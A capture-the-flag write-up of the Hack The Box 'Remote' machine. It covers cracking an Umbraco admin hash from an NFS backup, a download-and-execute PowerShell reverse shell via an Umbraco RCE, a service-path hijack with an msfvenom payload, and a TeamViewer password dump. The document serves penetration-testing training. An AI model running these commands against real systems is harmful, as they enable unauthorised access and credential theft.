Posts Remote Writeup [HTB]
Post
Cancel

Remote Writeup [HTB]

Remote is a Windows machine rated as easy from Hack The Box, it consists on finding some credentials in order to use an Umbraco RCE exploit to obtain initial access and then exploit UsoSvc service to gain a full privilege shell. Furthermore , teamviewer 7 can be exploited to obtain administrator credentials.

Enumeration

Running nmap :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
nmap -sC -sV 10.10.10.180
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-03 15:57 CEST                                                           
Nmap scan report for 10.10.10.180
PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|_  SYST: Windows_NT
80/tcp   open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Home - Acme Widgets
111/tcp  open  rpcbind       2-4 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/tcp6  rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  2,3,4        111/udp6  rpcbind
|   100003  2,3         2049/udp   nfs
|   100003  2,3         2049/udp6  nfs
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100005  1,2,3       2049/tcp   mountd
|   100005  1,2,3       2049/tcp6  mountd
|   100005  1,2,3       2049/udp   mountd
|   100005  1,2,3       2049/udp6  mountd
|   100021  1,2,3,4     2049/tcp   nlockmgr
|   100021  1,2,3,4     2049/tcp6  nlockmgr
|   100021  1,2,3,4     2049/udp   nlockmgr
|   100021  1,2,3,4     2049/udp6  nlockmgr
|   100024  1           2049/tcp   status
|   100024  1           2049/tcp6  status
|   100024  1           2049/udp   status
|_  100024  1           2049/udp6  status
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
2049/tcp open  mountd        1-3 (RPC #100005)

Browsing to port 80 we find the following page : Web

Running gobuster we find an interesting directory:

1
2
3
4
5
6
7
8
gobuster dir -u 10.10.10.180 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -t 200 -q
/home (Status: 200)
/blog (Status: 200)
/people (Status: 200)
/products (Status: 200)
/contact (Status: 200)
/install (Status: 302)
/about-us (Status: 200)

Browsing to /install we discover it is running Umbraco service

Web

As rpc service is open we can list mounts :

1
2
3
showmount -e 10.10.10.180
Export list for 10.10.10.180:
/site_backups (everyone)

This backup is available for everyone so we can mount it in our machine :

1
mount -t nfs 10.10.10.180:/site_backups /mnt

Then inside App_Data we find an interesting file Umbraco.sdf, running strings on it we find useful information:

1
2
strings Umbraco.sdf | head
admin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}

There we have a user and a hashed password, we can crack it using john:

1
2
3
4
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
john --show hash.txt
admin@htb.local:baconandcheese
1 password hash cracked, 0 left

Exploitation

With this set of credentials we can login to /install, and there we discover the site is running Umbraco 7.12.4 version

The following RCE exploit was found: https://www.exploit-db.com/exploits/46153.

Nishang Invoke-Tcp.ps1 will be uploaded to obtain a powershell reverse shell.

First we will setup a python server

1
python -m SimpleHTTPServer 80

Then the following line will be added to the powershell script so the reverse shell triggers automatically once uploaded:

1
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.15.26 -Port 443

Now we run the exploit :

1
python exploit.py -u admin@htb.local -p baconandcheese -i 'http://10.10.10.180' -c powershell.exe -a "IEX(New-Object Net.WebClient).downloadString('http://10.10.15.26:800/Invoke-PowerShellTcp.ps1')"

And we obtain a reverse shell in netcat :

1
2
3
4
5
6
7
nc -lvnp 443
listening on [any] 443 ...
tconnect to [10.10.15.26] from (UNKNOWN) [10.10.10.180] 49759
Windows PowerShell running as user REMOTE$ on REMOTE
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
PS C:\windows\system32\inetsrv> $env:UserName
REMOTE$

Privilege Escalation Method #1

To enumerate the system we will use PowerUp powershell script https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerUp

We upload it to the machine and load to memory :

1
2
PS C:\windows\temp> invoke-webrequest -Uri http://10.10.15.26:800/PowerUp.ps1 -OutFile PowerUp.ps1
PS C:\windows\temp> . .\PowerUp.ps1

Running it we obtain an interesting ouput:

1
2
3
4
5
6
7
PS C:\windows\temp> Invoke-AllChecks
[*] Running Invoke-AllChecks
[*] Checking service permissions...
ServiceName   : UsoSvc
Path          : C:\Users\Public\fremote.exe
StartName     : LocalSystem
AbuseFunction : Invoke-ServiceAbuse -ServiceName 'UsoSvc'

We can exploit this service following this guide

First, we create a shell with msfvenom :

1
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.15.26 LPORT=4444 -f exe >shell.exe

Then we stop the service, add our shell to the path and restart it :

1
2
3
PS C:\windows\temp> sc.exe stop UsoSvc
sc.exe config UsoSvc binPath="C:\windows\temp\shell.exe"
PS C:\windows\temp> sc.exe start UsoSvc

And we obtain a shell as nt authority\system :

1
2
3
4
5
6
7
8
9
nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.15.26] from (UNKNOWN) [10.10.10.180] 49691
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

Privilege Escalation Method #2

Enumerating the system, we find TeamViewer version 7 installed :

1
2
3
4
5
6
C:\Program Files (x86)>cd TeamViewer
C:\Program Files (x86)\TeamViewer>dir
Directory of C:\Program Files (x86)\TeamViewer
02/20/2020  03:14 AM    <DIR>          .
02/20/2020  03:14 AM    <DIR>          ..
02/27/2020  11:35 AM    <DIR>          Version7

This version is vulnerable to a credentials disclosure exploit : https://www.rapid7.com/db/modules/post/windows/gather/credentials/teamviewer_passwords

Using metasploit we can obtain Administrator credentials :

1
2
3
msf5 post(windows/gather/credentials/teamviewer_passwords) > exploit
[*] Finding TeamViewer Passwords on REMOTE
[+] Found Unattended Password: !R3m0te!

With this, we can use evil-winrm to log in as administrator :

1
2
3
4
5
6
7
evil-winrm -u Administrator -p '!R3m0te!' -i 10.10.10.180
Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
remote\administrator
This post is licensed under CC BY 4.0 by the author.